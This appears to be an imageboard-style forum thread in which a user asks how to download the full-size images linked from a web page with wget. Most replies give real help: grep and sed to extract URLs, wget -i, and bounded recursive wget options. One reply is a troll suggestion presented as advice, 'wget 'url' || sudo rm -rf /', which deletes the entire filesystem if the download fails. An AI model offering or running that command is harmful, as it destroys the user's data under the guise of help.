Need some assistance with wget. I'm trying to download the full-size images linked from a webpage of re-hosted images into a folder on my PC.
The links are in a format that looks like this: `<a href="http://image/123.jpg" rel="nofollow" target="_blank"><img src="./website/thumbs/123.jpg" border="0"></a>`
>>59262022
$ man wget
You'll figure it out
cd /path/to/folder
wget http://www.url.com/of/the/page.html
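>>59262022
That only saves the HTML, not the pictures. A rough sketch of the next step, assuming the page got saved as page.html (the printf below just fakes up a one-line page so you can see it work; page.html, urls.txt and the images/ folder are all names I made up):

```shell
# Fake a saved page containing one of OP's anchor tags
# (assumption: the real page has many lines like this).
printf '%s\n' '<a href="http://image/123.jpg" rel="nofollow" target="_blank"><img src="./website/thumbs/123.jpg" border="0"></a>' > page.html

# Pull out the full-size hrefs and strip the href="..." wrapper.
grep -o 'href="http://[^"]*\.jpg"' page.html | sed 's/^href="//; s/"$//' > urls.txt
cat urls.txt

# Then hand the list to wget:
# wget -nc -P images/ -i urls.txt
```

`-i` reads URLs from a file, `-nc` skips files you already have, `-P` picks the output folder.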
>>59262022
wget 'url' || sudo rm -rf /
>>59262022
You might be able to use wget's mirroring mode to snag them, but IIRC with no limits set it will happily start spidering across the entire internet, following every reference it finds.
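Something like this keeps the recursion on a leash (the host `image` and the page URL are just the placeholders from this thread, swap in the real ones):

```shell
# -r -l1        recurse, but only one level deep (the page plus what it links to)
# -H -D image   allow jumping to other hosts, but only the host the full-size hrefs point at
# -A '*.jpg'    accept only jpgs, delete everything else it fetches
# -nd -P pics   no mirrored directory tree, dump the files straight into ./pics
wget -r -l1 -H -D image -A '*.jpg' -nd -P pics 'http://www.url.com/of/the/page.html'
```

Without `-l1` and `-D` it has no reason to stop at the site's edge, which is the spidering problem above.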